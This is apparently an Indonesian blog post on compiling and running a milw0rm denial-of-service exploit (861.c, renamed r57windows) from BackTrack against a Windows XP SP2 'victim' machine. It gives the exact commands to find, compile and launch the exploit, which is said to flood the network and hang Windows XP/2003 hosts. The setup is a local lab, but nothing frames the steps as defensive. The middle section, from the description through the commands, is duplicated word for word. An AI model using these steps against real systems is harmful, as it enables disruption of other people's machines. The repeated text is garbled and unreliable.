Menjalankan Exploit (source code)
Banyak sekali exploit-exploit yang yang berasal dari milw0rm diantaranya adalah “r57windows.c” ya.. memang ini masih berupa source code, namun saya tidak akan membedah isi dari source code tersebut, tetapi bagaimana cara menjalankan exploit yang masih berbentuk source code. Di backtrack sendiri telah menyediakan banyak sekali source code keluaran milw0rm yang berada pada directory /pentest/exploits.
Exploit ini bekerja untuk membanjiri paket di sebuah jaringan, dan ampuh untuk menyerang Windows Server 2003 dan XP SP2, sehingga kinerja komputer korban akan terasa lambat atau bahkan Hang beberapa saat.
Persiapan:
- Notebook OS Backtrack
IP = 192.168.2.2
- Komputer Korban OS Windows XP SP2
IP = 192.168.2.3
ON BACKTRACK
—–++—–
# cd /pentest/exploit/milw0rm
# cat sploitlist-bt.txt | grep “Windows XP/2003″
— — — — — — — — — — — — — — —
./platforms/windows/dos/861.c MS Windows XP/2003 Remote Denial of Service Exploit
— — — — — — — — — — — — — — ——
# gcc platforms/windows/dos/861.c -o r57windows
# ./r57windows 192.168.2.3
Exploit ini bekerja untuk membanjiri paket di sebuah jaringan, dan ampuh untuk menyerang Windows Server 2003 dan XP SP2, sehingga kinerja komputer korban akan terasa lambat atau bahkan Hang beberapa saat.
Persiapan:
- Notebook OS Backtrack
IP = 192.168.2.2
- Komputer Korban OS Windows XP SP2
IP = 192.168.2.3
ON BACKTRACK
—–++—–
# cd /pentest/exploit/milw0rm
# cat sploitlist-bt.txt | grep “Windows XP/2003″
— — — — — — — — — — — — — — —
./platforms/windows/dos/861.c MS Windows XP/2003 Remote Denial of Service Exploit
— — — — — — — — — — — — — — ——
# gcc platforms/windows/dos/861.c -o r57windows
# ./r57windows 192.168.2.3
0 komentar: